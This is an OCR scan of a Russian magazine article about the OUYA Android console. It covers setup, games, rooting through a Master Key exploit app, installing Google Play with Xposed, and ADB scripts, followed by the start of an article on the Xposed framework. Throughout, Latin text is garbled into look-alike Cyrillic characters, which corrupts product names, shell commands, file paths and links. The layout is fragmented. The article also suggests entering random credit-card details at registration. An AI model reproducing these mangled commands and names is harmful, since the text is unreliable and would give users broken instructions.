Соге 1 ,7 ГГц Согіех А9 
(АВМѴ7-А) 

Графика: ГІѴЮІА 
ОеРогсе ЦІ.Р 520 МГц 
Память: 8 Гб 
ОЗУ: 1 Гб 

Беспроводные тех- 
нологии: ВІиеІооШ 1-Е 
4.0, 802,11 Ь/д/п 
Порты: тісгоЦЗВ, 
ЦЗВ 2.0, НРМ1 1.4 
(720р/1080р), ЕФегпеІ: 
10/100 




ЩРО 



Официально игры 
от СатеІоГС (Мосіегп 
СотЬаМ, напри- 
мер) совместимы 
только с джойстиками 
МОСА. Но игру легко 
обмануть и заставить 
работать с контрол- 
лером ОІІУА, вставив 
в ЦЗВ-порт консоли 
мышь или клавиатуру. 





X- МоЫІе 
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ТНАЫК УОЦ 
ГОК ВЕЫЕѴІЫ6. 




Невзрачная коробка ОІІУА 



Спасибо за то, что верили 



После открытия 




Содержимое коробки 



Четыре порта сбоку 



Подключенная и работающая 




Джойстик с четырьмя светодиодами и тачпадом 




Батарейки в «рогах» 



Стартовый экран 



Далее ОЦУА проверит наличие обновлений и, если оно бу- 
дет найдено, сразу начнет его скачивать. Обновления здесь 
распространяются в стандартных для АпбгоісІ гір-файлах, по- 
этому после завершения скачивания происходит перезагруз- 
ка в местный Несоѵегу, который автоматически устанавливает 
прошивку. После следующей загрузки ОЦУА предложит заре- 
гистрировать аккаунт и указать сведения о кредитной карте. 
Причем номер кредитки нужно вводить обязательно — очень 
странно, учитывая, что для ОЦУА полно бесплатных игр и прило- 
жений. С другой стороны, номер не проверяется, так что для на- 
чала можно ввести рандомные данные. 

Это все. Теперь на экране должен появиться «рабочий стол» 
ОЦУА, который в последней доступной мне прошивке разделен 
на две части. Сверху располагаются последнее запущенное 
приложение и рекомендуемые игры, а в нижней — четыре пун- 
кта: РІау, Оізсоѵег, Маке и Мападе. Первый пункт открывает окно 
со списком установленных игр, второй служит для поиска игр 
и приложений, третий раздел предназначен для разработчиков. 




ЩРО 

Перед сдачей этой 
статьи тестовая 
сборка ХВМС стала 
доступна в магазине 
ОЦУА. Таким обра- 
зом, теперь игровую 
консоль можно легко 
превратить в мощный 
медиацентр. 



Для ОЦУА, помимо неиграбельного хлама 




іГІПЛУІ /I 

/ии/ѵш 



сделанного явно для экзамена по ш 

в Ш 

тике, уже есть и общепризнанные хиты 



В нем размещаются автоматически загруженные с помощью 
50К сборки игр, а также список вручную установленных прило- 
жений. 

Последний пункт — это, по сути, меню настроек. Здесь 
можно изменить данные аккаунта, добавить или удалить кре- 
дитки, изменить язык {русского нет), проверить на обновления 
или открыть родное, но очень урезанное окно настроек Апбгоіб. 
Оно пригодится, когда придется иметь дело со сторонними 
приложениями, которые почему-то нельзя удалить через род- 
ной интерфейс ОЦУА. 

ИГРЫ, ПРИЛОЖЕНИЯ И ПРОИЗВОДИТЕЛЬНОСТЬ 

Сомневаюсь, что многие из читателей будут использовать при- 
ставку по прямому назначению, поэтому об играх скажу кратко. 
На момент написания этих строк для ОЦУА насчитывалось около 
400 игр, среди которых удалось отыскать: 

1 . Общепризнанные хиты: Зопіс 4 ерізосіе 2, ЗИабоѵѵдип, НпаІ 
Рапіазу 3, СапаЬаК, Ісе Раде, Пасііапі, Еѵас, а также потряса- 
ющие ВагсГз Таіе и Зіпе Мога. 

2. 10-20 интересных инди-игр различных независимых раз- 
работчиков. 

3. Огромное количество неиграбельного хлама, сделанного 
для экзамена по информатике. 

Доступны также эмуляторы для всех известных приставок 
прошлого, включая Репсіу, Зирег Міпіепбо, Зеда Меда Ргіѵе, 
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Іипеіп 



РІА У 

РІ5СОѴЕР 

МАКЕ 

МАМА6Е 



'ОЙПЁЙ ОРГ 



АЦЫсн 




Домашний экран 



Местный маркет 



РІауЗІабоп, Кііпіюпсіо 64 и других, так что те, кто хочет предаться 
ностальгии, найдут здесь все необходимое. На приставку так- 
же можно залить любую АпбгоісІ-игру, скачав ее из интернета 
с помощью встроенного браузера, залив, используя ЦЗВ-шнур, 
либо установив на приставку Ооодіе РІау. Главное, чтобы игра 
поддерживала джойстик. 

В местном маркете можно найти и несколько приложений, 
включая файловый менеджер РіІеРѵѵп, медиаплеер ѴІ_С, пле- 
ер интернет-радио Типеіп Васііо, чат РгепЬее и даже караоке 
РокгКагаоке. Другими словами, даже без лишних манипуляций 
ОЦУА практически из коробки неплохой медиаплеер с аппарат- 
ным декодером Ріііі НЮ видео. Но ввиду ограниченного объема 
внутренней памяти придется обзавестись еще и емкой флеш- 
кой или внешним жестким диском (правда, отформатировать 
его нужно в РАТ32 либо ех!4, ну или получить гооі и установить 
ІЧТРЗ-драйвер от Рагадоп). 

СТОРОННИЕ ПРИЛОЖЕНИЯ И СЮ ОС 1-Е РІАУ 

Одна из самых привлекательных черт ОЦУА — это возможность 
без всяких хаков и получения гооі запустить практически любое 
Апбгоіб- приложение. Для этого достаточно скачать программу 
откуда угодно, закинуть с помощью Ц5В- кабеля, а затем уста- 
новить через файловый менеджер. Иконка приложения появит- 
ся в меню Маке. 

Второй способ — это установить один из сторонних мар- 
кетов, например Атаіоп Арр Зіоге или Уапбех Зіоге. Они оба 
совместимы с ОЦУА, однако большинству читателей, скорее 
всего, не подойдут из-за необходимости повторной оплаты 
приложения, которое уже было куплено в Ооодіе РІау. А послед- 
ний, как известно, должен быть установлен как системное при- 
ложение, для чего нужен гооі. 

К счастью, получить гооі; в ОЦУА и, как следствие, устано- 
вить Ооодіе РІау, очень просто. Даже самую последнюю про- 
шивку можно легко поломать с помощью приложения Пооі Му 
ОЦУА ( доо.дІ/РЗЦѵѵОа ). которое использует нашумевший экс- 
плойт Мазіег Кеу, позволяющий устанавливать хакнутые си- 
стемные приложения. Все, что нужно сделать, — это открыть 
браузер ОЦУА (находится в меню Маке), перейти на страницу 
приложения, скачать его и установить с помощью файлового 
менеджера. После запуска на экране появится кнопка ЗІаП 
Вооі 

Чтобы установить сам Ооодіе РІау, придется немного пово- 
зиться. Дело в том, что он несовместим с ОЦУА, но может на ней 
работать благодаря специальному модулю (патчу), который 
можно активировать с помощью фреймворка ХрозесІ. Этот патч 
включен в состав целой коллекции твиков под названием Моб 
СоІІесІіоп Рог ОЦУА, ее мы должны установить перед Ооодіе 
РІау. В результате вся цепочка действий по активации Ооодіе 
РІау в ОЦУА будет выглядеть так; 

1 . Получаем гооі. 

2. Устанавливаем фреймворк ХрозесІ отсюда: сісо.йі. м;\ . . 
запускаем, нажимаем кнопку Іпзіаіі/Црбаіе и перезагружа- 
ем приставку. 

3. Устанавливаем Моб СоІІесІіоп отсюда: доо.аІ/РГ)15 .запу- 
скаем, нажимаем Оп напротив Ооодіе РІау Зіоге Моб и на- 
жимаем ІпзІаІІ РІау Зіоге. 




ШАІШШС 

При активации опции 
511 &Мобз Ргезегѵег 
в МосІ СоІІесІіоп и по- 
следующем обновлении 
нужно заранее подклю- 
чить к ОЦУА клавиатуру, 
так как после переза- 
грузки СІоскѵѵогкМосЗ 
потребует подтвердить 
установку обновления 
с нарушенной цифровой 
подписью, а джойстик 
в это время работать 
не будет. 




ШРО 

Для ОЦУА уже есть 
полностью работоспо- 
собный СуаподепМоб, 
который поддер- 
живает и джойстик. 
Скачать можно здесь: 
аоо.аІ/РОрЗѵЦ . 
Устанавливается с по- 
мощью перезагрузки 
в Песоѵегу либо с по- 
мощью приложений 
ПОМ Мападег или 
Аиіо РІазбег. 



4. Запускаем Хрозеб и на вкладке Мобиіез ставим галочку на- 
против Мой СоІІесІіоп Рог Оиуа. Перезагружаем приставку. 

5. Запускаем Ооодіе РІау и вводим данные аккаунта. 

Обрати внимание, что в коллекции модов есть еще четыре 

интересных пункта: 

• ЗЦ & Мобз Ргезегѵег. Очень полезный хак, который позво- 
ляет сохранить гооі и Ооодіе РІау после автоматического 
обновления прошивки. Требует установки СІоскѵѵогкМоб 
с помощью соответствующей кнопки (перед этим сле- 
дует установить ВизуВох). Если кнопка не сработала, 
то СІоскѵѵогкМоб можно установить вручную, а после 
этого активировать данную опцию (как это сделать, рас- 
сказано во врезке «Устанавливаем СІоскѵѵогкМоб вруч- 
ную»). 

• РізаЫе Аиіо Црбаіе. Не менее полезный хак, который от- 
ключает функцию автоматического обновления. Нужен 
потому, что обновление ОЦУА невозможно остановить; 
если приставка обнаружила новую прошивку, она будет 
пытаться скачать ее и установить до бесконечности, даже 
если это невозможно сделать по техническим причинам. 
После отключения обновление можно проверить вручную 
в меню: Мападе — > Зузіет — ► Зузіет Црбаіез. 



УСТАНАВЛИВАЕМ 
СЮСКѴѴЭККМОО ВРУЧНУЮ 

Проще всего установить СІоскѵѵогкМоб, используя 
АРВ, Если ОЦУА рутована и на нее уже установлен 
Ооодіе РІау, то достаточно установить и запустить 
на приставке ѴѴіРі АРВ, а затем подключиться к вы- 
веденному на экран адресу: 

$ абЬ соппесЕ 192.168.0.104:5555 

Далее берем с диска, прилагаемого к журналу, 
файлы ОиуаСѴѴМгесоѵегу6.0.3.2.ітд и СѴѴМРІазбЗегірІ. 
зіт, копируем их на приставку: 

$ асІЬ ризб ОиуаСММгесоѵегуб.0. 3.2. іт^: 

/БбсагсІ/ 

$ абЬ ризб СЫМРІазб5сгір1: . зб /зсісагсі/ 

Прошиваем: 

$ абЬ збеіі 

$ 5.и . 

$ ссі /баЕа/тесІіа _\Ѵ 

І 5 И СиІУіІгІЙ5ІТ5СГІрѢ.5Ь 
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Мипеіп 

Воока ЗМасІе - Зоіо 



ВеІаЕеЬ 






Расііо Весогсі - Весогсі СКШ-Оиі 




01] СЫУоиі 



Воока ЗМагіе - 5оІо Сну 
ІбВГГ.РМ САКЕ 



■Ш 



Ігн! 



1 ,ЕМ - СЫН Ои! иоипде 





Интернет-радио Типеіп 



Соодіе РІау и сторонние приложения 




ШРО 

В местном марке- 
те есть несколько 
бесплатных игр 
знаменитого ин- 
ди-разработчика 
Терри Кавана (Теггу 
Саѵападіі), однако 
его хитовый Зирег 
Нехадоп придется 
ставить из РІау Зіоге, 
благо игра поддержи- 
вает джойстик. 



* Рогсе РЮМІ Незоіиііоп. Хак, позволяющий выбрать разреше- 
ние: 720р или 1080р. Консоль всегда выбирает максималь- 
но возможное разрешение, но если ты хочешь получить 
выигрыш в производительности, то можешь принудительно 
его снизить. Результатом станет более плавная работа ин- 
терфейса и возросший РРЗ в играх, однако я бы не стал то- 
ропиться с изменением этой настройки, не потестив игры; 
в моем случае даже такие тяжеловесы, как Зіпе Мога, шли 
в РиІІ НО без каких-либо провалов РРЗ. 

* Ріх Оѵегзсап. Фикс редкого бага с неправильным масштаби- 
рованием изображения. Если картинка выходит за преде- 
лы экрана телевизора, то стоит поиграться со значениями 
в окне ввода справа (от 0.00 до 0.20). 

УДАЛ ЕН НОЕ УП РАВЛ ЕИ И Е 

ОІГѴА поддерживает одновременную работу с четырьмя джой- 
стиками, однако в комплекте с ней идет только один. Кроме 
игр, его можно использовать также для навигации по системе 
меню, набора текста и любых других задач, включая управле- 
ние курсором с помощью тачпада. Он действительно удобен, 
но это далеко не единственный способ управления приставкой, 
а если речь идет о превращении ОЦУА в мультимедиацентр, 
то и не лучший. 

Одним из вариантов удаленного управления могут быть 
клавиатура и мышь, В приставке имеется два ЦЗВ-порта, один 
из которых тісго, и поддержка ІІЗВ-хабов, так что ОЦУА можно 
легко превратить в этакий мини -комп, особенно если допол- 
нительно установить из маркета более привычный домашний 
экран, вроде Арех І_аипсІіег или Ыоѵа І_аипсИег, и нормальный 
браузер. 

Еще один вариант — это всевозможные портативные 
ВІиеіооФ-клавиатуры, которые за копейки продаются в Китае 



РАСШИРЯВ ОБЪЕМ ВНУТРЕННЕЙ ПАМЯТИ 

Объем внутренней памяти ОІІУА составляет всего 8 Гб, так что после установ- 
ки нескольких тяжеловесных приложений память может просто закончиться. 
Решить эту проблему можно с помощью создания флешки с двумя разделами, 
второй раздел отформатировать в файловую систему ехі4. После подключения 
такой флешки в приставку следует ее смонтировать, набрав в консоли или АРВ 
такие команды: 

$ 5 и 

# ткбіг /баба/збехИ 

# трип! -1: ехѣ4 /<іеѵ/Ыоек/ѵо1сІ/8\ : 2 /ба1:а/$сІех1:2 

Далее достаточно установить и запустить приложение Ыпк23Р из Соодіе 
РІау, и ты получишь возможность переместить любое приложение на флешку 
(следует использовать кнопку Ыпк Іо 50, а не Моѵе іо Зй), Монтировать раздел 
придется вручную после каждой перезагрузки. 



и предназначены для использования в кооперации с так назы- 
ваемыми мини- ПК на базе того же Апбгоісі. С ОЦУА они работа- 
ют не хуже, чем с любым другим Апбгоісі-девайсом. Одна про- 
блема — английская раскладка. 

Также можно использовать удаленные пульты для смарт- 
фонов, такие как ВТСопігоІ или ОгоісіМоіо. Первый работает 
по ВІиеіооіН и включает в себя несколько разных наборов джой- 
стиков и пультов. Сильная черта приложения — возможность 
создавать свои собственные джойстики с произвольным набо- 
ром кнопок, вплоть до полноценной ОѴѴЕНТУ- клавиатуры. Сла- 
бая — идиотская система пайринга, которая срабатывает через 
раз и перехватывает контроль над клавиатурой. 

ОгоісІМоіе, напротив, работает по ѴѴІ-Рі, что плохо — мо- 
гут появляться задержки и лаги (при просмотре РиІІ РЮ видео 
по сети, например). Зато в составе этого приложения есть все 
необходимые инструменты управления, начиная от тачпада 
и клавиатуры и заканчивая джойстиком. Два очевидных мину- 
са: платный сервер (1 доллар) и необходимость получения гооі. 
Огромный плюс: возможность использовать джойстик для аб- 
солютно любых игр, даже тех, которые поддерживают только 
сенсорное управление (для этого придется скачать или создать 
мэппинг кнопок к точкам на экране). 

На ОЦУА без проблем работает СИеарСазі — приложе- 
ние, которое позволяет превратить любое Апб го 16 -устройство 
в СНгоплесазі-совместимый девайс. Работает это так: уста- 
навливаешь СИеарСазі на ОЦУА, запускаешь, нажимаешь 51а Гб 
Зегѵісе, далее берешь в руки смартфон, выбираешь в ютубе 
ролик и нажимаешь кнопку в форме прямоугольника вверху, 
далее выбираешь в списке Оиуа Сопзоіе, и ролик начинает про- 
игрываться на экране телевизора, а проматывать его и ставить 
на паузу можно с помощью смартфона. Это очень удобно, од- 
нако поддерживаются пока только УоиТиЬе и стандартный ви- 
деоплеер. 

С большого компа рулить девайсом можно с помощью АЦВ, 
протокола для отладки Апбгоіб. Для этого достаточно устано- 
вить из маркета приложение ѴѴіРі АОВ, запустить его, а на ма- 
шину скачать ДЭВ-клиент. Клиент консольный, поэтому его 
очень удобно использовать в разных скриптах или Ьаі-файлах, 
если речь идетоѴѴіпбоѵѵз. 

МАСТЕР-КЛАСС АОВ 

На моей домашней машине стоит І_іпих, поэтому я написал не- 
сколько скриптов для управления ОЦУА с помощью АРВ. Пер- 
вый просто перебирает пять- шесть адресов в локальной сети, 
пытаясь найти Апбгоіб-устройство и подключиться к нему: 

$ ѵі '-/Ып/асоппесб . 

#! /Ып/бЬ 
^Т-192. 168.0 
кіііаіі абЬ 

■Рог і іп 1Ѳ0 101 1Ѳ2 1ѲЗ 1Ѳ4 1 05; 6о 

абЬ соппесі: ${І\ІЕТ}^_$і 

боле 



Может быть, проще было бы настроить привязку ІР-адреса 
к МАС’у ОЦУА и не париться с перебором, но мой вариант хо- 
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рош тем, что позволяет подключиться к любому устройству, 
а не только к ОША. 

Второй скрипт нужен для удаленного ввода текста: 

$ ѵі ~/Ьіп/аіпри1:.5Іі 

#! /Ьіп/зН 

асІЬ зНеІІ іприі ііехі: $1 
асІЬ зНеІІ іприі: кеуеѵепі: бб 

Достаточно выбрать поле ввода с помощью джойстика, а за- 
тем набрать 

$ аіприб.ьИ "Я ввел этот текст" 

Этот скрипт очень удобно использовать для ввода разного 
рода логинов, паролей и адресов сайтов. Однако последние на- 
много удобнее вводить с помощью такого скрипта: 

$ ѵі ~/Ьіп/аореп,5Іт 

#! /Ьіп/зК 

асІЬ зЬеІІ ат з^агі: -а 

апсігоісі . іпіепі . ас^іоп.ѴіЕЫ -сі $_1 

Он открывает указанный адрес прямо в браузере, что осо- 
бенно полезно, когда надо выкачать какой-то файл из интернета 
прямо в консоль. 

Ну и последний скрипт я использую для снятия скриншотов 
{в том числе для этой статьи): 

$ ѵі ~/Ып/аасгееп. 5Ь 

#! /Ып/бЬ 

асІЬ зИеІІ Бсгеепсар /зсісагсІ/$1 
асІЬ риіі /зсІсагсі/$1 
асІЬ зЬеІІ рт /зсІсапсІ/$1 

Использовать так: 

$ азспееп.зЬ скриншот. рп§ 

Есть и несколько других полезных команд. Например: 

// Перезагрузка в Кесоѵегу 

$ асІЬ геЬооЬ гесоѵегу 

и Наж атие кнопки Ромег (выключение/включение) 

$ асІЬ 5бе11__іпри'1 кеуеѵепі: 26 

// Установка пак ета 

$ асІЬ іпзіаіі пакет. арк 

II Получение файлов с устр ойства 

$ асІЬ риіі /зсісагсі/файл 




ШГО 

У ОША разблокированный загрузчик, поэтому она полностью открыта 
для перепрошивки и разных хаков. Например, подключив ОША кабелем 
к ПК, ее можно заставить загрузить СІоскѵѵогкМосІ, даже не устанавливая 
его: асІЬ геЬооЬ ЬооЫоаРег, ^азЬЬооЬ Ьооі: ОиуаШМгесоѵегуб.0.3.2.іт§. 



й Могі СоІІесІІОіі Рог Оиуа Ьу ѴѴопгіегЕкіп(йХОА 



о М Соодіе Ріау Зіоге Мосі 

СІіск "ІПЕІаІІ Ріау Зіоге" уои сіісігГІ Наѵе і! уеі. Зпв1з|! р|ау 5ІОГ0 

ом 311 & Мосіз Ргезегѵег 

СДОМ Гесоѵегу гедиігесі, 

сІіск "ІпзІаІІ СѴѴМ Кесоѵегу" (Ьу туЬоок4@ХЬА) іо іпэіаіі. ІІ15Га " сѵѵм Несоѵегу 

ом ОізаЫе Аиіо Ырсіаіе 

Уои сап сЬеск !ог ирсіаіе тапиаііу іп МАЫАСЕ > ЗѴЗТЕМ > ЗѴЗТЕМ ІІРЭАТЕЗ 

орг Рогсе РЮМІ Везоіиііоп 

О 720 р О 1 080 р 

орр Ріх Оѵегзсап 

ОеГаиІІ Зсаіе Ѵаі Сизіот ЗсаІѳ ѴаІ (0.00-0.20) 0.0 Зег Ѵаі 



Мосі СоІІесііоп Рог 
Оиуа: набор из пяти 
мастхэв-тБиков 



ШРО 

Варианты замены 
рабочего стола: Зтагі 
ЬаипсЬег, ТѴІ_аипсЬег, 
ТѴ Вох ЬаипсЬег. 



ВЫВОДЫ 

До ОША я использовал в качестве медиаплеера китайский 
НЭМІ-стик на АпбгоісІ 4.1, о котором написал целую статью 
для одного из предыдущих выпусков журнала. Не скажу, 
что ОША уделывает китайского конкурента по всем фронтам, 
но она определенно больше подходит для любителей поко- 
выряться в прошивке и железе. С момента выпуска приставки 
прошло всего несколько месяцев, а ее уже успели кастомизи- 
ровать, портировать полноценный СуаподепМосІ, придумали 
множество хаков и интернет-сайтов, посвященных исключи- 
тельно ОША. 

Уже сейчас видно, что это действительно народная кон- 
соль, которая пользуется популярностью среди множества лю- 
дей. Да, это не конкурент РІауЗІаІіоп и ХЬох, но это приставка, 
сделанная людьми и для людей, которой действительно при- 
ятно пользоваться и создатели которой всегда прислушивают- 
ся к юзерам. Разработчики уже объявили, что будут выпускать 
новую ОША каждый год с появлением обновленных чипов 
ГѵІѴЮІАТедга, и могу сказать наперед, что, если цена приставки 
не изменится, я с удовольствием приобрету себе обновленную 
версию. ОС 





Одно из очевидных применений ОША — это создание домашнего медиа- 
центра. Для этого у консоли есть все необходимое, за исключением емкого 
хранилища видео- и аудиофайлов. Одним из вариантов решения этой про- 
блемы станет покупка МАЗ или самостоятельная сборка файлового хранили- 
ща с сервером иРпР/ОІ_ЫА, который позволит автоматически подключаться 
к хранилищу и играть с него файлы. Поддержка ЭЕ№А есть в ѴІ_С и ХВМС, ко- 
торые доступны в маркете ОША. 

Второй вариант — это подключение хранилища к самой приставке с по- 
мощью ІІЗВ-порта. Можно использовать как емкую флешку, так и внешние 
жесткие диски, включая 3,5-дюймовые кейсы с переходниками ЗАТА — 

ЕІЗВ. Даже дешевый кейс для жесткого диска китайского производства 
способен обеспечить скорость чтения-записи в 20 Мб/с, чего с лихвой 
хватит для скачивания файлов с помощью торрент- клиента и проигрывания 
РиІІ НЮ видео. 

В качестве файловой системы рекомендую использовать РАТ, однако 
если такой возможности нет, то ЫТРЗ или ех14. Диск, отформатированный 
в МТРЗ, будет автоматически смонтирован при подключении к каталогу /тпі/ 
изббгіѵе, но только в режиме для чтения. Чтобы получить возможность запи- 



си, придется использовать внешний МТРЗ-драйвер, например Рагздоп ІЧТР5 
& НРЗ+. Ех14-разделы придется монтировать самостоятельно с помощью 
следующей команды: 

$ Б и щ '' ,\\\\\\\\ иѵпш 

# тоипі -1: /сІеѵ/ЬІоск/зсіаХ /тпі/изЬсІгіѵе \\ п\уп \ 

Чтобы не вводить команду после каждого включения консоли, можно 
установить из маркета и активировать приложение иіпіѵегзаі іпіІД а затем 
поместить указанную команду в файл /зуз1ет/е1с/іпі1.сІ/ех14тоип1. 

В качестве торрент-клиента лучше всего использовать ІТоггепІ. Это един- 
ственный полноценный клиент для Апбгоіб, сопоставимый по функциональ- 
ности с деектопными аналогами. Его бесплатная версия имеет ограничение 
в 250 Кб/с, для снятия которого придется заплатить 131 рубль, Это совсем 
недорого для приложения такого класса. Смотреть видео и слушать музыку 
удобнее всего в плеерах ѴІ_С и ѴРІауег. И тот и другой поддерживают прак- 
тически все существующие форматы и задействуют аппаратный декодер 
видео. 





Х-МоЫІе 
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Как кастомизировать Апйгоій, не устанавливая патчи 

Базирующийся на ядре І_іпих и открытый АпсІгоісІ как будто создан для разных хаков и модифи- 
каций. За все время существования мобильной ОС на ее основе были созданы сотни кастомных 
прошивок, найдены десятки способов изменения ее внешнего вида и поведения, появилась 
функциональность, не предусмотренная Ооодіе. Однако получить нужные функции до недавнего 
времени можно было, лишь перепрошив устройство, что неудобно и в ряде случаев опасно. 



ВВЕДЕНИЕ, ИЛИ КАК ОНИ ЭТО ДЕЛАЮТ 

Хакерам, модерам и прочим энтузиастам из- 
вестно несколько способов изменения внешнего 
вида, поведения и других параметров АпсІгоісІ. 
Три наиболее популярных: 

1. Правка файлов /зузіе т /Тгат емогкДгате - 

ѵѵогк^аг, /зузіет/ігатеѵгогк/ігатеѵі/огк-гез.іаг 
и /зузіет/арр/ЗузІетІЛ.арк, которые содер- 
жат описание интерфейса и ресурсы, нужные 
для его отображения. Редактируя эти файлы, 
можно изменить внешний вид практически лю- 
бого компонента интерфейса, начиная от раз- 
мера кнопок и заканчивая цветом надписей. 

2. Правка исходных текстов компонентов си- 
стемы. С помощью этого способа можно из- 
менить что угодно — от реакции на нажатие 
кнопок громкости до полного изменения по- 
ведения системы, Другими словами, можно 
переделать ОС под себя. 

3. Декомпиляция и правка системных прило- 
жений, не имеющих исходных текстов. Таким 
образом можно изменить фирменные прило- 
жения Соодіе, такие как Соодіе РІау и ОтаіІ, 
исходники которых поисковый гигант не вы- 
кладывает. 

Проблема всех этих способов в том, что они 
не позволяют менять АпсІгоісІ «на живую». Нель- 
зя взять со смартфона файл /зузіет/ігатеѵѵогк/ 
Тгатеѵѵогк-гез.іаг, исправить его и скопировать 
обратно в систему. Технически в этом нет ничего 
сложного, достаточно получить гооі, перемонти- 
ровать /зузіет в режиме чтения-записи и выпол- 
нить необходимые действия, однако изменения 
не вступят в силу до перезагрузки, да и загрузится 
ли система с новым файлом — большой вопрос. 

Кроме того, изменив системный компонент, 
нельзя быть уверенным, что модификация зара- 
ботает на другом смартфоне, даже если на нем 
установлена та же версия системы. А если версии 
различаются, то надежды нет совсем. В некото- 
рых случаях модификацию вообще не удастся 
установить, так как загрузчик может быть залочен, 
а системный раздел защищен от записи (привет 
Моіогоіа). 

Из-за этих ограничений разработчики вы- 
пускают модификации либо в составе готовых 
прошивок, либо в виде обновлений, предназна- 
ченных для определенных версий ОС и моделей 



смартфонов. И те и другие следует устанавли- 
вать через консоль восстановления, перед этим 
сделав бэкап предыдущей прошивки и соблюдая 
последовательность, так как, установив одну мо- 
дификацию поверх другой, затрагивающей тот же 
файл, мы потеряем функциональность первой. 

В общем, слишком много хлопот для разра- 
ботчиков и слишком много проблем для пользо- 
вателей. К счастью, существует гораздо более 
дружелюбный способ установки модификаций 
и расширений, 

ПЕРЕХВАТ УПРАВЛЕНИЯ 

Суть способа в следующем. Практически любая 
современная операционная система состоит 
из ядра и большого количества взаимосвязанных 
компонентов. В 1_іпих это /Ьооі/ѵгпііпиг и библио- 
теки из каталогов /ІіЬ и /изг/НЬ; в ѴѴіпбоѵѵз это ядро 
кегпеІ32.сІІІ и большое количество Р1_!_-библиотек 
из системного каталога; в АпсІгоісІ это опять же 
ядро І_іпих в выделенном разделе и большое ко- 
личество Заѵа- классов, упакованных в тот самый 
файл /зузіет/ігатеѵюгк/ігатемогк.іаг. 

Практически все компоненты, за исключени- 
ем ядра, могут быть загружены либо во время 
инициализации ОС, либо по мере необходимо- 
сти. Это значит, что компонент можно подменить 
на модифицированный, что, по сути, и проис- 
ходит, когда мы устанавливаем одну из модифи- 
каций АпсІгоісІ классическим способом: один или 
несколько файлов заменяются и загружаются си- 
стемой при следующем включении. 

Однако, как мы уже выяснили, у такого спосо- 
ба куча проблем, и поэтому лучше использовать 
другой путь, а именно: вклиниться в процесс за- 
грузки файла (а в случае АпсІгоісІ это Заѵа-класс), 
затем перехватить вызовы его методов и напра- 
вить по другому адресу. Так мы убьем сразу двух 
зайцев: не сломаем систему, поскольку не будем 
изменять системные компоненты вообще, и ре- 
шим проблему с неудобством установки модифи- 
каций, так как сможем направить перехваченные 
вызовы (методы) Заѵа- класса кому угодно, напри- 
мер обычному непривилегированному приложе- 
нию. Именно так работает Хрозеб. 

ХРОЗЕО РНАМЕШОАК 

Любой класс в Апбгоіб загружается с помощью 
небольшого нативного приложения /зузіет/ 



Ьіп/аррргосезз. Его задача — запустить вирту- 
альную машину Оаіѵік, загрузить необходимые 
для работы системные классы (окружение испол- 
нения) и передать управление классу (на самом 
деле происходит обращение к сервису 2удоіе, 
который форкает уже готовую ВМ и окружение 
в режиме сору-оп-ѵиііе, но в нашем случае это 
неважно). 

Хрозеб представляет собой модифицирован- 
ную версию арр ргосезз, которая при запуске 
первым делом загружает в память специальный 
баѵа-класс-перехватчик, а лишь после него — 
оригинальный баѵа-класс. Перехватчик выступает 
в качестве посредника для любых вызовов баѵа- 
методов, инициированных оригинальным клас- 
сом, и, в случае необходимости, перенаправляет 
их классу-обработчику. 

Последний как раз и занимается тем, что из- 
меняет поведение системы. Например, для опре- 
деления цвета текста приложения использу- 
ют метод СеЮоІог класса апбгоіб.сопіепі.гез. 
Везоигсез. Если класс-обработчик перехватит 
этот метод и вернет вместо кода серого цвета 
код зеленого, все надписи в интерфейсе станут 
зелеными. Модификации могут быть и более 
сложными, например когда они связаны с альтер- 
нативной реализацией сразу нескольких методов 
и целых классов. 

В комплекте Хрозеб готовых классов-обработ- 
чиков нет, но он позволяет любому разработчику 
распространять их в виде обычных АРК-пакетов, 
а пользователю просто установить и активировать 
с помощью специального интерфейса. Другими 
словами, с помощью Хрозеб можно устанавли- 
вать и удалять модификации АпсІгоісІ как обычные 
приложения, без необходимости в прошивке, 
копировании в системный каталог и без какого- 
либо риска. 

МОДУЛИ 

В терминологии Хрозеб классы-обработчики на- 
зываются модулями, и в данный момент их насчи- 
тывается уже более сотни. Причем это не какие- 
то игрушки с изменением цветов из предыдущего 
примера, а серьезные доработки, такие как дви- 
жок тем, глубокие модификации строки состо- 
яния, секьюрити-патчи, блокиратор рекламы, 
менеджер полномочий приложений и многое дру- 
гое. В оставшейся части статьи я расскажу о наи- 
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■Здесь вы можете угтлийоить ХродаІ систему. Это база дли модулей которые могут изменить лтедеиие и внешний вид вашего такфшій Апсігйі с) Длп 

получения ДЙПЙЛНИТРПЬНЛИ ИНфЛрМЭіЛ^И глттрпір 
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МЙСІСВ'Д перкз.чгрузкз 
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УЯАлеки* (й«хтан&пя*ми# ярр^гьемхі 



Очистка Полное удапочне) 
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Для установки Хрозесі достаточно нажать одну кнопку 




Посла активации новых модулей устройство придется перезагружать 




\ѵ\ѵ\ѵ 

Платная версия 
ХРгіѵасу с возможно- 
стью импорта и экс- 
порта настроек: .УѴТО. 
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Большая коллекция 
модулей Хрозеб: 

ООО.ОІ/НІ7ІІ1 



более интересных модификациях, а пока о том, 
как установить Хрозесі. 

Хрозесі невозможно найти в маркете, с точ- 
ки зрения Ооодіе это вредоносное приложение, 
которое может навредить системе. Это, конеч- 
но же, не так, но мы не будем спорить с Ооодіе, 
а просто скачаем приложение из интернета (дэо, 
дІ/МЬК.ѵ2!9, файл ХрозебІпз{аІІег_2. 1 ,4.арк). После 
установки приложение запросит права гооі, а за- 
тем выведет на экран интерфейс с несколькими 
кнопками. Нажимаем ІозІаІІ/ЭрсІаіе и перезагру- 
жаем смартфон. 

Все установленные пакеты, содержащие мо- 
дули Хрозесі, будут автоматически появляться 
на вкладке Мосіиіез приложения. Включить их 
можно, просто поставив галочку напротив, а за- 
тем перезагрузив смартфон. К сожалению, искать 
и скачивать модули придется самостоятельно, так 
как в Ооодіе РІау большинства из них нет, а рабо- 
та по созданию родного репозитория Хрозесі еще 
не завершена. 

МОДИФИКАЦИИ ИНТЕРФЕЙСА 

Наибольшего внимания заслуживают модули, 
которые каким-либо образом изменяют внеш- 
ний вид операционной системы. Таких модулей 
на просторах инета довольно много, и среди них 
есть бриллианты из разряда тизі Раѵе. В этом 
разделе мы поговорим о них. 

Махітіге ѵѵібдеіз оп Іоскзсгееп (аоо.сіі/ 
рсаМВб ). Простой модуль, который автомати- 
чески разворачивает виджеты на экране блоки- 
ровки при включении смартфона. Очень удобен 
при использовании больших информационных 



виджетов наподобие ОазбСІоск. В СуаподепМоб, 
кстати, есть аналогичная функциональность (На- 
стройки — > Экран блокировки — >■ Развернутые 
виджеты). 

